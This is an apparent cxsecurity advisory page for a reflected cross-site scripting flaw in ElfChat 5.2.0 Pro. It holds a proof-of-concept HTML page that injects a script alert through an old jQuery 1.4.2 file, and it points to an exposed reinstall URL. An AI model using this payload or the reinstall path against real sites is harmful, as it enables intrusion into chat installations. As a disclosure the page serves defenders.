ElfChat 5.2.0 Pro Cross Site Scripting

2014.10.05
Credit: indoushka
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

ElfChat 5.2.0 Pro Reinstall SCript EXploits =========================================== Author : indoushka Vondor : http://elfchat.ru/ Dork: 2011 Elfet - ElfChat 5.2.0 Pro ========================== <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery 1.4.2 </title> <script src="http://127.0.0.1/ElfChat//admin/js/jquery-1.4.2.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert(&#x27;xss reflected - jquery 1.4.2 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option> </select> </p> </form> </body> </html> === and : /ElfChat/js/datepicker/js/jquery.js /ElfChat/js/min/jquery.js Reinstall SCript : http://127.0.0.1/ElfChat/install/index.php?act=settings


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top